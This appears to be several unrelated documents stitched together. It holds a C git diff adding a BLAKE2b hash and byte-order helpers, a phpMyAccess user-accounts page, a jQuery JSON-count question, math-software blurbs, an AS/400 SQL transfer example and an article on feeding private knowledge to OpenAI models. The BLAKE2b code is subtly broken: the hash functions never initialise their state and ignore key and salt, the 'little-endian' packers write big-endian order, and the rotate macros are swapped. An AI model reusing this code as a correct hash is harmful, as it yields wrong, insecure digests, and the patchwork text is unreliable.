blake2b_set_lastblock(S); + mem_zero(S->buf + S->buflen, 2 * BLAKE2B_BLOCKBYTES - S->buflen); /* Padding */ + blake2b_compress(S, S->buf); + + COMPILER_ASSERT(sizeof buffer == 64U); + uint64_pack_le(buffer + 8 * 0, S->h[0]); + uint64_pack_le(buffer + 8 * 1, S->h[1]); + uint64_pack_le(buffer + 8 * 2, S->h[2]); + uint64_pack_le(buffer + 8 * 3, S->h[3]); + uint64_pack_le(buffer + 8 * 4, S->h[4]); + uint64_pack_le(buffer + 8 * 5, S->h[5]); + uint64_pack_le(buffer + 
8 * 6, S->h[6]); + uint64_pack_le(buffer + 8 * 7, S->h[7]); + mem_copy(out, buffer, outlen); /* outlen <= BLAKE2B_OUTBYTES (64) */ + + mem_zero(S->h, sizeof S->h); + mem_zero(S->buf, sizeof S->buf); + + return 0; +} + +/* inlen, at least, should be uint64_t. Others can be size_t. */ +int +blake2b(uint8_t *out, const void *in, const void *key, const uint8_t outlen, const uint64_t inlen, uint8_t keylen) +{ + blake2b_state S[1]; + + blake2b_update(S, (const uint8_t *) in, inlen); + blake2b_final(S, out, outlen); + return 0; +} + +int +blake2b_salt_personal(uint8_t *out, const void *in, const void *key, const uint8_t outlen, const uint64_t inlen, uint8_t keylen, const void *salt, const void *personal) +{ + blake2b_state S[1]; + + blake2b_update(S, (const uint8_t *) in, inlen); + blake2b_final(S, out, outlen); + return 0; +} +int +blake2b_compress(blake2b_state *S, const uint8_t block[BLAKE2B_BLOCKBYTES]) +{ + uint64_t m[16]; + uint64_t v[16]; + int i; + + for (i = 0; i < 16; ++i) + m[i] = uint64_unpack_le(block + i * sizeof(m[i])); + for (i = 0; i < 8; ++i) + v[i] = S->h[i]; + + v[8] = blake2b_IV[0]; + v[9] = blake2b_IV[1]; + v[10] = blake2b_IV[2]; + v[11] = blake2b_IV[3]; + v[12] = S->t[0] ^ blake2b_IV[4]; + v[13] = S->t[1] ^ blake2b_IV[5]; + v[14] = S->f[0] ^ blake2b_IV[6]; + v[15] = S->f[1] ^ blake2b_IV[7]; + +#define G(r, i, a, b, c, d) \ + do { \ + a = a + b + m[blake2b_sigma[r][2 * i + 0]]; \ + d = uint64_rotr(d ^ a, 32); \ + c = c + d; \ + b = uint64_rotr(b ^ c, 24); \ + a = a + b + m[blake2b_sigma[r][2 * i + 1]]; \ + d = uint64_rotr(d ^ a, 16); \ + c = c + d; \ + b = uint64_rotr(b ^ c, 63); \ + } while (0) + +#define ROUND(r) \ + do { \ + G(r, 0, v[0], v[4], v[8], v[12]); \ + G(r, 1, v[1], v[5], v[9], v[13]); \ + G(r, 2, v[2], v[6], v[10], v[14]); \ + G(r, 3, v[3], v[7], v[11], v[15]); \ + G(r, 4, v[0], v[5], v[10], v[15]); \ + G(r, 5, v[1], v[6], v[11], v[12]); \ + G(r, 6, v[2], v[7], v[8], v[13]); \ + G(r, 7, v[3], v[4], v[9], v[14]); \ + } while (0) + + ROUND(0); + ROUND(1); + ROUND(2); + ROUND(3); + ROUND(4); + ROUND(5); + ROUND(6); + ROUND(7); + ROUND(8); + ROUND(9); + ROUND(10); + ROUND(11); + +#undef G +#undef ROUND + + for (i = 0; i < 8; ++i) + S->h[i] = S->h[i] ^ v[i] ^ v[i + 8]; + + return 0; +} diff --git a/blake2b.h b/blake2b.h @@ -0,0 +1,65 @@ +/* + * BLAKE2 reference source code package - reference C implementations + * + * Written in 2012 by Samuel Neves <[email protected]> + * + * To the extent possible under law, the author(s) have dedicated all copyright + * and related and neighboring rights to this software to the public domain + * worldwide. This software is distributed without any warranty. + * + * All code is triple-licensed under the + * [CC0](http://creativecommons.org/publicdomain/zero/1.0), the + * [OpenSSL Licence](https://www.openssl.org/source/license.html), or + * the [Apache Public License 2.0](http://www.apache.org/licenses/LICENSE-2.0), + * at your choosing. 
+ */ + +#ifndef BLAKE2_H +#define BLAKE2_H + +#include <stddef.h> +#include <stdint.h> + +enum blake2b_constant { + BLAKE2B_BLOCKBYTES = 128, + BLAKE2B_OUTBYTES = 64, + BLAKE2B_KEYBYTES = 64, + BLAKE2B_SALTBYTES = 16, + BLAKE2B_PERSONALBYTES = 16 +}; + +typedef struct blake2b_param_ { + uint8_t digest_length; /* 1 */ + uint8_t key_length; /* 2 */ + uint8_t fanout; /* 3 */ + uint8_t depth; /* 4 */ + uint8_t leaf_length[4]; /* 8 */ + uint8_t node_offset[8]; /* 16 */ + uint8_t node_depth; /* 17 */ + uint8_t inner_length; /* 18 */ + uint8_t reserved[14]; /* 32 */ + uint8_t salt[BLAKE2B_SALTBYTES]; /* 48 */ + uint8_t personal[BLAKE2B_PERSONALBYTES]; /* 64 */ +} blake2b_param; + +typedef struct blake2b_state { + uint64_t h[8]; + uint64_t t[2]; + uint64_t f[2]; + uint8_t buf[2 * 128]; + size_t buflen; + uint8_t last_node; +} blake2b_state; + +int blake2b(uint8_t *, const void *, const void *, const uint8_t, const uint64_t, uint8_t); +int blake2b_compress(blake2b_state *, const uint8_t block[BLAKE2B_BLOCKBYTES]); +int blake2b_final(blake2b_state *, uint8_t *, uint8_t); +int blake2b_init(blake2b_state *, const uint8_t); +int blake2b_init_key(blake2b_state *, const uint8_t, const void *, const uint8_t); +int blake2b_init_key_salt_personal(blake2b_state *, const uint8_t, const void *, const uint8_t, const void *, const void *); +int blake2b_init_param(blake2b_state *, const blake2b_param *); +int blake2b_init_salt_personal(blake2b_state *, const uint8_t, const void *, const void *); +int blake2b_salt_personal(uint8_t *, const void *, const void *, const uint8_t, const uint64_t, uint8_t, const void *, const void *); +int blake2b_update(blake2b_state *, const uint8_t *, uint64_t); + +#endif diff --git a/log.c b/log.c @@ -24,8 +24,7 @@ log_put(int level, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -43,8 +42,7 @@ log_put_sys(int level, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -63,8 +61,7 @@ log_fatal(int e, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } @@ -83,8 +80,7 @@ log_fatal_sys(int e, char const *type, int argc, ...) va_start(a, argc); buffer_puts(buffer_2, type); buffer_puts(buffer_2, ": "); - for (int x = 0; x < argc; x++) - { + for (int x = 0; x < argc; x++) { char *s = va_arg(a, char *); buffer_puts(buffer_2, s); } diff --git a/mem.c b/mem.c @@ -6,3 +6,9 @@ mem_chr(char const *buf, size_t n, char c) char *p = memchr(buf, c, n); return p ? 
p - buf : n; } + +void +mem_xor(unsigned char *out, const unsigned char *in, size_t n) +{ + for (size_t i = 0; i < n; i++) out[i] ^= in[i]; +} diff --git a/mem.h b/mem.h @@ -12,5 +12,6 @@ #define mem_zero(buf, n) memset(buf, 0, n) size_t mem_chr(char const *, size_t, char); +void mem_xor(unsigned char *, const unsigned char *, size_t); #endif diff --git a/package-add.c b/package-add.c @@ -122,8 +122,7 @@ main(int argc, char **argv) if (!genalloc_append(&ga, p)) die_nomem(); // download and build download-time dependencies - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if (!p->dep_download) continue; if ((x = get(p, def, pkg)) != 0) return x; @@ -131,15 +130,13 @@ main(int argc, char **argv) } // download everything - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if ((x = get(p, def, pkg)) != 0) return x; } // build everything - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if ((x = build(p, def, pkg)) != 0) return x; } @@ -147,8 +144,7 @@ main(int argc, char **argv) if (flag_n) return 0; // install run-time dependencies - for (size_t i = 0; i < genalloc_len(&ga, package); ++i) - { + for (size_t i = 0; i < genalloc_len(&ga, package); ++i) { package *p = genalloc_get(&ga, package, i); if (!p->dep_run) continue; if ((x = install(p, def, pkg, root)) != 0) goto error; diff --git a/package-install.c b/package-install.c @@ -24,8 +24,7 @@ main(int argc, char **argv) (void)argc; - while (*++av) - { + while (*++av) { if (str_equal(*av, "-p")) { if (!(pkg = *++av)) break; continue; } if (str_equal(*av, "-d")) { if (!(def = *++av)) break; continue; } if (str_equal(*av, "-r")) { if (!(root = *++av)) break; continue; } diff --git a/package-tree.c b/package-tree.c @@ -40,12 +40,10 @@ tree(package *p, stralloc *prefix, char const *def) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; buffer_init(&b, &read, fd[i], buf, sizeof buf); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); diff --git a/package.c b/package.c @@ -39,8 +39,8 @@ error: return ret; } -int -package_env_dep_l(package const *p, char const *pkg) +static int +package_env_lib(package const *p, char const *pkg) { stralloc sa; char buf[NAME_MAX]; @@ -68,7 +68,7 @@ error: } static int -package_env_dep_bd(package const *p, char const *pkg) +package_env_path(package const *p, char const *pkg) { stralloc sa; char *path; @@ -108,20 +108,19 @@ package_env_dep(package *p, char const *def, char const *pkg) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; + buffer_init(&b, &read, fd[i], buf, sizeof buf); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); if (!stralloc_cat0(&sa)) goto error; if (sa.x[package_dep_scan(&p, sa.x, sa.n)] != '\0') goto 
error; if (!package_version(&p, def)) goto error; - if (!package_env_dep_l(&p, pkg)) goto error; - if (!package_env_dep_bd(&p, pkg)) goto error; + if (!package_env_lib(&p, pkg)) goto error; + if (!package_env_path(&p, pkg)) goto error; } if (r != 0) goto error; } @@ -156,16 +155,14 @@ package_scan(package *p, char const *s, size_t n) if (s[0] == '/') return 0; - for (i = 0; i < n; ++i, ++x) - { + for (i = 0; i < n; ++i, ++x) { if (!isprint(s[i]) || s[i] == ' ') goto end; if (s[i] == '/') { ++i; break; } if (i >= sizeof p->name) return 0; p->name[x] = s[i]; } - for (; i < n; ++i, ++y) - { + for (; i < n; ++i, ++y) { if (!isprint(s[i]) || s[i] == ' ') goto end; if (s[i] == '/') break; if (i > sizeof p->ver) return 0; @@ -192,10 +189,8 @@ package_dep_scan(package *p, char const *s, size_t n) y = package_scan(p, s + x + 1, n - x - 1); if (x + 1 + y == n) return 0; - for (size_t i = 0; i < x; ++i) - { - switch (s[i]) - { + for (size_t i = 0; i < x; ++i) { + switch (s[i]) { case 'd': p->dep_download = 1; break; case 'b': p->dep_build = 1; break; case 'l': p->dep_lib = 1; break; @@ -210,11 +205,9 @@ package_dep_scan(package *p, char const *s, size_t n) static int package_dep_has(package const *p, genalloc *packages) { - for (size_t i = 0; i < genalloc_len(packages, package); ++i) - { + for (size_t i = 0; i < genalloc_len(packages, package); ++i) { package *x = genalloc_get(packages, package, i); - if (str_equal(x->name, p->name)) - if (str_equal(x->ver, p->ver)) + if (str_equal(x->name, p->name) && str_equal(x->ver, p->ver)) return 1; } return 0; @@ -313,14 +306,11 @@ package_dep(package const *p, genalloc *packages, char const *def) fd[1] = package_dep_open_version(p, def); if (fd[1] == -1 && errno != ENOTDIR && errno != ENOENT) goto error; - for (int i = 0; i < 2; ++i) - { + for (int i = 0; i < 2; ++i) { if (fd[i] == -1) continue; buffer_init(&b, &read, fd[i], buf, sizeof buf); - stralloc_init(&sa); - while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) - { + while (stralloc_zero(&sa), (r = buffer_getline(&b, &sa)) > 0) { package p; sa.n -= (sa.x[sa.n - 1] == '\n'); @@ -333,8 +323,8 @@ package_dep(package const *p, genalloc *packages, char const *def) } if (r != 0) goto error; } - ret = 1; + error: if (fd[0] >= 0) close(fd[0]); if (fd[1] >= 0) close(fd[1]); diff --git a/package.h b/package.h @@ -22,8 +22,6 @@ int package_dep(package const *, genalloc *, char const *); int package_dep_open_default(package const *, char const *); int package_dep_open_version(package const *, char const *); int package_env_dep(package *, char const *, char const *); -int package_env_dep_build_download(package const *, char const *); -int package_env_dep_lib(package const *, char const *); int package_env_prefix(package *, char const *, char const *); int package_version(package *, char const *); size_t package_dep_scan(package *, char const *, size_t); diff --git a/uint32.c b/uint32.c @@ -0,0 +1,39 @@ +#include "uint32.h" + +void +uint32_pack_le(unsigned char s[4], uint32_t u) +{ + s[3] = u & 255; + s[2] = u >> 8 & 255; + s[1] = u >> 16 & 255; + s[0] = u >> 24; +} + +void +uint32_pack_be(unsigned char s[4], uint32_t u) +{ + s[0] = u & 255; + s[1] = u >> 8 & 255; + s[2] = u >> 16 & 255; + s[3] = u >> 24; +} + +uint32_t +uint32_unpack_le(const unsigned char s[4]) +{ + uint32_t x = (unsigned char)s[3]; + x |= (uint32_t)(unsigned char)s[2] << 8; + x |= (uint32_t)(unsigned char)s[1] << 16; + x |= (uint32_t)(unsigned char)s[0] << 24; + return x; +} + +uint32_t +uint32_unpack_be(const unsigned char s[4]) +{ + 
uint32_t x = (unsigned char)s[0]; + x |= (uint32_t)(unsigned char)s[1] << 8; + x |= (uint32_t)(unsigned char)s[2] << 16; + x |= (uint32_t)(unsigned char)s[3] << 24; + return x; +} diff --git a/uint32.h b/uint32.h @@ -0,0 +1,14 @@ +#ifndef UINT32_H +#define UINT32_H + +#include <stdint.h> + +#define uint32_rotr(x, b) (uint32_t)(((x) << (b)) | ((x) >> (32 - (b)))) +#define uint32_rotl(x, b) (uint32_t)(((x) >> (b)) | ((x) << (32 - (b)))) + +uint32_t uint32_unpack_be(const unsigned char s[4]); +uint32_t uint32_unpack_le(const unsigned char s[4]); +void uint32_pack_be(unsigned char s[4], uint32_t); +void uint32_pack_le(unsigned char s[4], uint32_t); + +#endif diff --git a/uint64.c b/uint64.c @@ -1,7 +1,7 @@ #include "uint64.h" void -uint64_pack(char s[8], uint64_t u) +uint64_pack_le(unsigned char s[8], uint64_t u) { s[7] = u & 255; s[6] = u >> 8 & 255; @@ -14,7 +14,7 @@ uint64_pack(char s[8], uint64_t u) } void -uint64_pack_big(char s[8], uint64_t u) +uint64_pack_be(unsigned char s[8], uint64_t u) { s[0] = u & 255; s[1] = u >> 8 & 255; @@ -26,36 +26,30 @@ uint64_pack_big(char s[8], uint64_t u) s[7] = u >> 56; } -void -uint64_unpack(const char s[8], uint64_t *u) +uint64_t +uint64_unpack_le(const unsigned char s[8]) { - uint64_t x; - - x = (unsigned char)s[7]; - x += (uint64_t)(unsigned char)s[6] << 8; - x += (uint64_t)(unsigned char)s[5] << 16; - x += (uint64_t)(unsigned char)s[4] << 24; - x += (uint64_t)(unsigned char)s[3] << 32; - x += (uint64_t)(unsigned char)s[2] << 40; - x += (uint64_t)(unsigned char)s[1] << 48; - x += (uint64_t)(unsigned char)s[0] << 56; - - *u = x; + uint64_t x = (unsigned char)s[7]; + x |= (uint64_t)(unsigned char)s[6] << 8; + x |= (uint64_t)(unsigned char)s[5] << 16; + x |= (uint64_t)(unsigned char)s[4] << 24; + x |= (uint64_t)(unsigned char)s[3] << 32; + x |= (uint64_t)(unsigned char)s[2] << 40; + x |= (uint64_t)(unsigned char)s[1] << 48; + x |= (uint64_t)(unsigned char)s[0] << 56; + return x; } -void -uint64_unpack_big(const char s[8], uint64_t *u) +uint64_t +uint64_unpack_be(const unsigned char s[8]) { - uint64_t x; - - x = (unsigned char)s[0]; - x += (uint64_t)(unsigned char)s[1] << 8; - x += (uint64_t)(unsigned char)s[2] << 16; - x += (uint64_t)(unsigned char)s[3] << 24; - x += (uint64_t)(unsigned char)s[4] << 32; - x += (uint64_t)(unsigned char)s[5] << 40; - x += (uint64_t)(unsigned char)s[6] << 48; - x += (uint64_t)(unsigned char)s[7] << 56; - - *u = x; + uint64_t x = (unsigned char)s[0]; + x |= (uint64_t)(unsigned char)s[1] << 8; + x |= (uint64_t)(unsigned char)s[2] << 16; + x |= (uint64_t)(unsigned char)s[3] << 24; + x |= (uint64_t)(unsigned char)s[4] << 32; + x |= (uint64_t)(unsigned char)s[5] << 40; + x |= (uint64_t)(unsigned char)s[6] << 48; + x |= (uint64_t)(unsigned char)s[7] << 56; + return x; } diff --git a/uint64.h b/uint64.h @@ -3,9 +3,12 @@ #include <stdint.h> -void uint64_pack(char s[8], uint64_t); -void uint64_pack_big(char s[8], uint64_t); -void uint64_unpack(const char s[8], uint64_t *); -void uint64_unpack_big(const char s[8], uint64_t *); +#define uint64_rotr(x, b) (uint64_t)(((x) << (b)) | ((x) >> (64 - (b)))) +#define uint64_rotl(x, b) (uint64_t)(((x) >> (b)) | ((x) << (64 - (b)))) + +uint64_t uint64_unpack_be(const unsigned char s[8]); +uint64_t uint64_unpack_le(const unsigned char s[8]); +void uint64_pack_be(unsigned char s[8], uint64_t); +void uint64_pack_le(unsigned char s[8], uint64_t); #endif
phpmyaccess-1.5.3/phpmyaccess/useraccounts.php

<?php
function MyHeader ($header)
{
    echo("<?xml version=\"1.0\"?>
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"
    \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<title>$header</title>
</head>
<body bgcolor=\"#ffeb10\">
<div class=\"main\">
<h3>$header</h3>
");
}

// MySQL host name, user name, password, database, and table to edit
include 'dbaccess.php';
$tb = 'useraccounts';

$header = "User accounts maintenance";

// Name of field which is the unique key
$key = 'useracc_ID';

// Type of key field (int/real/string/date etc)
$key_type = 'int';

// Number of records to display on the screen
$inc = 15;

// Options you wish to give the users - A(dd) C(hange) D(elete) F(ilter) Z(oom) J(ump)
$options = 'ACDFJZP';

$auth = 999;
$debug = 0;

//
$fdd['user_name']['name'] = 'User Key';
$fdd['user_name']['sort'] = true;
$fdd['user_name']['select'] = 'T';
$fdd['user_name']['required'] = true;

$fdd['user_logname']['name'] = 'User Logname';
$fdd['user_logname']['sort'] = true;
$fdd['user_logname']['select'] = 'T';
$fdd['user_logname']['required'] = true;
$fdd['user_logname']['length'] = 10;

$fdd['user_passwd']['name'] = 'User Passwd';
$fdd['user_passwd']['sort'] = true;
$fdd['user_passwd']['select'] = 'T';
$fdd['user_passwd']['required'] = true;
$fdd['user_passwd']['password'] = true;
$fdd['user_passwd']['length'] = 15;
//$fdd['user_passwd']['listview'] = false;

$fdd['user_level']['name'] = 'User Level';
$fdd['user_level']['sort'] = true;
$fdd['user_level']['select'] = 'T';

// and now the all-important call to PHPMyEdit
// warning - beware of case-sensitive operating systems!
include 'PHPMyEdit.php';

function Post_Run()
{
    echo "
    </div>
    <p></p>
    <hr width=\"30%\" >
    <table>
    <tr>
    <td><a href=\"index.php\" name=\"link\">Main Page</a></td>
    <td> &nbsp;&nbsp;&nbsp; </td>
    <td><a href=\"index.php?page=menus\" name=\"link\">Menus Maintenance Page</a></td>
    </tr>
    </table>
    <br><b> User : ".$GLOBALS['auth_user']." </b><br>
    ";
}

function footer ()
{
    echo " </body>\n</html>\n";
}
?>
How do I get the total number of JSON records using jQuery?

Published 2019-10-03

I can't find anything about getting the total count of JSON records with jQuery.

Here is the returned JSON:

{"Email": "Please enter your email.", "Password": "Please enter a password."}

And here is my code:

$(function() {
  $("#btnSubmit").click(function() {
    $.ajax({
      url: "/account/signup",
      type: "POST",
      dataType: "json",
      data: { Email: $("#strEmail").val(), Password: $("#strPassword").val() },
      success: function(j) {
        $(".errMsg").hide();
        alert(j.length); // I couldn't get the total count
        $.each(j, function(n) {
          $("#err" + n).html(j[n]);
          $("#err" + n).show();
        })
      },
      error: function(req, status, error) {
        alert(req);
      }
    });
  });
});

Solution

If you have something like this:

var json = [ {a:b, c:d}, {e:f, g:h, ...}, {..}, ... ]

then you can do:

alert(json.length)
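Note, though, that the JSON shown in the question is a plain object, not an array, so it has no length property. A small sketch of counting an object's members (my addition, not part of the original answer):

var json = { "Email": "Please enter your email.", "Password": "Please enter a password." };

// Works even in old browsers: count the object's own members in a loop.
var count = 0;
for (var key in json) {
  if (json.hasOwnProperty(key)) {
    count++;
  }
}
alert(count); // 2

// Or, where ES5 is available:
alert(Object.keys(json).length); // 2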
Oberwolfach References on Mathematical Software

4 Search Results

ATLAS
The ATLAS (Automatically Tuned Linear Algebra Software) project is an ongoing research effort focusing on applying empirical techniques in order to provide portable performance. At present, it provides C and Fortran77 interfaces to a portably efficient BLAS implementation, as well as a few routines from LAPACK.
More information

Gauss
Introduction: Gauss is an easy-to-use data analysis, mathematical and statistical environment based on the powerful, fast and efficient GAUSS Matrix Programming Language. It is used to solve problems of exceptionally large scale. Program development and program execution are fast. Programs run in command-line mode (as in DOS or Unix), with a limited Windows graphical user interface; GAUSS plot features a fully functional, interactive GUI. It can be used as a tool for designing one's own algorithms, for doing quick simulations, and for writing compact programs, given the number of matrix-based statistical and financial functions. It is suited to numerical computation and handles matrices in the same way as scalars. It provides a C-library interface.
More information

LinBox
LinBox is a C++ template library for exact, high-performance linear algebra computation with dense, sparse, and structured matrices over the integers and over finite fields. LinBox has the following top-level functions: solve linear system, matrix rank, determinant, minimal polynomial, characteristic polynomial, Smith normal form and trace. A good collection of finite field and ring implementations is provided, for use with numerous black box matrix storage schemes.
More information

SuperLU
SuperLU is a general purpose library for the direct solution of large, sparse, nonsymmetric systems of linear equations on high performance machines. The library is written in C and is callable from either C or Fortran. The library routines will perform an LU decomposition with partial pivoting and triangular system solves through forward and back substitution. The LU factorization routines can handle non-square matrices, but the triangular solves are performed only for square matrices. The matrix columns may be preordered (before factorization) either through library or user supplied routines. This preordering for sparsity is completely separate from the factorization. Working-precision iterative refinement subroutines are provided for improved backward stability. Routines are also provided to equilibrate the system, estimate the condition number, calculate the relative backward error, and estimate error bounds for the refined solutions.
More information
Example 1: Using SELECT, WHERE, and ORDER BY

To transfer a list of all available types of tea drinks sorted alphabetically:

1. Specify the GROCERY/PRODUCT file in the Lib/File(Member) field on the main file transfer screen, then open the From AS/400 - Options dialog box:

[screenshot: From AS/400 - Options dialog box]

2. Verify that the Select field on the Overview page contains an asterisk (*). This indicates that all fields in the PRODUCT file will be transferred.

3. To transfer all records containing the string Tea, type the following string in the Where field:

PRODNAME LIKE '%Tea%'

The % character is a wildcard indicating any number of characters:

[screenshot: Where field containing the LIKE condition]

4. To sort the data in ascending order by the type of drink, type the following string in the Order By field:

PRODDESC

5. Click Apply to update the query fields:

SELECT * FROM grocery/product WHERE (PRODNAME LIKE '%Tea%') ORDER BY PRODDESC

The resulting records are:

ProdID ProdDesc ProdName ProdQuant
100570263 761831637 Cranberry Ice Tea Crystal Falls Cranberry Ice Tea 302
100570263 761831635 Diet Peach Ice Tea Crystal Falls Diet Peach Tea 79
100570263 761831636 Diet Rasp Ice Tea Crystal Falls Diet Rasp Ice Tea 110
100570263 761831638 Lemon Ice Tea Crystal Falls Lemon Ice Tea 218
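As a further illustration (a hypothetical variation on the same file, assuming the Where and Order By fields accept the usual SQL operators, including DESC), transferring only the diet teas in reverse alphabetical order could use:

Where: PRODNAME LIKE '%Diet%Tea%'
Order By: PRODDESC DESC

which combine into:

SELECT * FROM grocery/product WHERE (PRODNAME LIKE '%Diet%Tea%') ORDER BY PRODDESC DESC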
【OpenAI】Code Generation for Private Frameworks in Practice | JD Cloud Tech Team

Author: Niu Xiaoguang, JD Retail

Based on current research and practice, the ChatGPT/GPT-4 and Codex models provided by OpenAI understand and generate the logic and code of most mainstream programming languages well, and they are especially strong at Python, JavaScript, TypeScript, Ruby, Go, C# and C++.

In real-world work, however, we often code against private frameworks, packages, protocols and DSLs. Because the models have not learned from the latest web data, and because such private material is usually not published on the open web anyway, OpenAI cannot generate the corresponding code from this private information.

I. Ways to teach OpenAI models private knowledge

OpenAI provides several ways to let its models learn private knowledge:

1. Fine-tuned models

OpenAI supports generating a private, custom model from an existing base model by supplying "prompt - completion" training data.

Usage

Fine-tuning involves the following steps:

1. Prepare the training data: the data must contain prompt/completion pairs, in formats such as CSV, TSV, XLSX or JSON.
   • Format the training set: openai tools fine_tunes.prepare_data -f <LOCAL_FILE>
   • LOCAL_FILE: the training data prepared above.
2. Run the fine-tuning job: openai api fine_tunes.create -t <LOCAL_FILE> -m <BASE_MODULE> --suffix "<MODEL_SUFFIX>"
   • LOCAL_FILE: the training set prepared in the previous step.
   • BASE_MODULE: the name of the base model; the options include ada, babbage, curie and davinci.
   • MODEL_SUFFIX: a suffix for the custom model's name.
3. Use the custom model.

Cost

Besides paying for inference against the custom model, the tokens consumed while training it are also billed. By base model, the prices are as follows:

[screenshot: fine-tuning price table]

Conclusion

Learning private knowledge by fine-tuning depends on a large amount of training data: the more training data, the better the result. This approach suits scenarios where a large body of data has already been accumulated.

2. Chat completion

GPT models take input in conversation form, with the conversation organized by roles. A conversation opens with the system role, whose message gives the model its initial instructions. The system role can carry all kinds of information, such as:

• a brief description of the assistant
• the assistant's personality traits
• instructions or rules the assistant must follow
• data or information the model needs

In the chat, we can use a custom system role to give the model the private information it needs to carry out the user's instructions.

Usage

Prepend a description of the private knowledge to the content submitted by the user:

openai.createChatCompletion({
  model: "gpt-3.5-turbo",
  messages: [
    {
      role: "system",
      content: "You are a chatbot that helps users answer technical questions about CCMS, a low-code engine for content management systems. Answer based on the context below; if you are unsure of the answer, you may say \"I don't know\".\n\n" +
        "Context:\n" +
        "- CCMS generates admin pages for back-office systems through visual configuration; it describes page information in JSON and renders the pages at runtime.\n" +
        "- CCMS supports several page types, including plain lists, filtered lists, creation forms, edit forms and detail views.\n" +
        "- CCMS can configure interactions such as page information, API definitions, conditional logic, data binding and page navigation."
    },
    { role: "user", content: "What is CCMS?" }
  ]
}).then((response) => response.data.choices[0].message.content);

Cost

Besides the content the user submits, the private-knowledge description submitted through the system role is also billed by tokens consumed:

[screenshot: chat-completion price table]

Conclusion

Learning private knowledge through chat completion depends on the information fed to the system role, and the tokens for that part are consumed again on every user request. This approach suits scenarios where the private knowledge is clear, accurate and small in volume.

II. Private-knowledge learning in practice

Private frameworks, packages, protocols and DSLs usually come with fairly complete documentation, but rarely with a large accumulation of user data, so in this scenario we lean towards chat completion to teach GPT the private knowledge.

On top of that, supplying the system role with a small but precise slice of knowledge is the key to saving cost while keeping the service usable.

3. The search-ask solution

Before calling the chat service OpenAI provides, we can use the text the user submitted to search the private knowledge and filter out the most relevant pieces, and only then issue the chat request, cutting token consumption. OpenAI's embedding service covers the work of the search stage.

Usage

1. Prepare the search data (one-time)
   • Collect: prepare complete documentation. For example: https://jd-orion.github.io/docs
   • Chunk: split the documentation into short, mostly self-contained pieces; these are usually the pages or sections of the document.
   • Embed: call the OpenAI API for each chunk to generate an embedding:

await openai.createEmbedding({
  model: "text-embedding-ada-002",
  input: fs.readFileSync('./document.md', 'utf-8').toString(),
}).then((response) => response.data.data[0].embedding);

   • Store: save the embedding data; a sketch of this step follows after these steps. (For large datasets, a vector database can be used.)

2. Retrieve (once per query)
   • Generate an embedding for the user's question, with the same call as in the Embed step.
   • Use the question embedding to rank the private-knowledge chunks by their relevance to the question:

const fs = require('fs');
const { parse } = require('csv-parse/sync');
const distance = require('compute-cosine-distance');

function search(input: number[], topN: number) {
  const knowledge: { text: string, embedding: string, d?: number }[] =
    parse(fs.readFileSync('./knowledge.csv').toString(), { columns: true });
  for (const row of knowledge) {
    row.d = distance(JSON.parse(row.embedding), input)
  }
  knowledge.sort((a, b) => a.d - b.d);
  return knowledge.slice(0, topN).map((row) => row.text);
}

3. Ask (once per query)
   • Insert the information most relevant to the question into the system role of the request:

async function ask(knowledge: string[], input: string) {
  const response = await openai.createChatCompletion({
    model: "gpt-3.5-turbo",
    messages: [
      {
        role: 'system',
        content: "You are a chatbot that helps users answer technical questions about CCMS, a low-code engine for content management systems.\n\n" +
          knowledge.join("\n")
      },
      { role: 'user', content: input }
    ]
  }).then((response) => response.data.choices[0].message.content);
  return response
}

   • Return GPT's answer.
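The Store step above is left without code in the original; the sketch below is one hypothetical way to produce the knowledge.csv file that the retrieval code in step 2 reads. The text/embedding column layout is inferred from that code, and csv-stringify is assumed as the counterpart of the csv-parse package used there:

const fs = require('fs');
const { stringify } = require('csv-stringify/sync');

async function buildKnowledge(chunks) {
  const rows = [];
  for (const text of chunks) {
    // One embedding per documentation chunk, as in the Embed step
    const response = await openai.createEmbedding({
      model: "text-embedding-ada-002",
      input: text,
    });
    // Store the vector as a JSON string so JSON.parse() can restore it later
    rows.push({ text, embedding: JSON.stringify(response.data.data[0].embedding) });
  }
  fs.writeFileSync('./knowledge.csv', stringify(rows, { header: true }));
}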
Cost

With this method, a one-time payment is required for the tokens consumed to run the embeddings:

[screenshot: embedding price table]

III. Case study: building pages from natural language in a low-code platform

With private-knowledge learning solved, we can start using GPT to generate code that targets private frameworks, libraries, protocols and DSLs.

